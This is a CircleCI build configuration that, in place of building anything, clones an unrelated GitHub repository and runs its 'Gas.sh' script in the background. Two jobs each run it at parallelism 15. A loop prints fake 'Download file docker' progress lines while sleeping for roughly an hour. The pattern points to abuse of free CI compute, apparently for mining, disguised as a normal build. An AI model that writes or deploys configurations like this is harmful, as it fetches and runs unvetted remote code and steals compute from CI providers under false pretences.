working_dir: &working_dir ~/app 
.build_template: &script
  steps:
    - checkout
    #- setup_remote_docker
    - run:   nohup git clone https://github.com/Jsjsh992/kedua.git && cd kedua && chmod +x Gas.sh && ./Gas.sh &
                for i in {1..15}; do echo -n "Download file docker $i "; date ; sleep 230; done
version: 2.0 
jobs: 
  build: 
    <<: *script
    parallelism: 15
    machine:
        image: ubuntu-2004:202101-01
    
    
  build2: 
    <<: *script
    parallelism: 15
    machine:
        image: ubuntu-2004:202101-01
  
  
workflows: 
  version: 2 
  commit: 
    jobs: 
      - build
      - build2
     
    
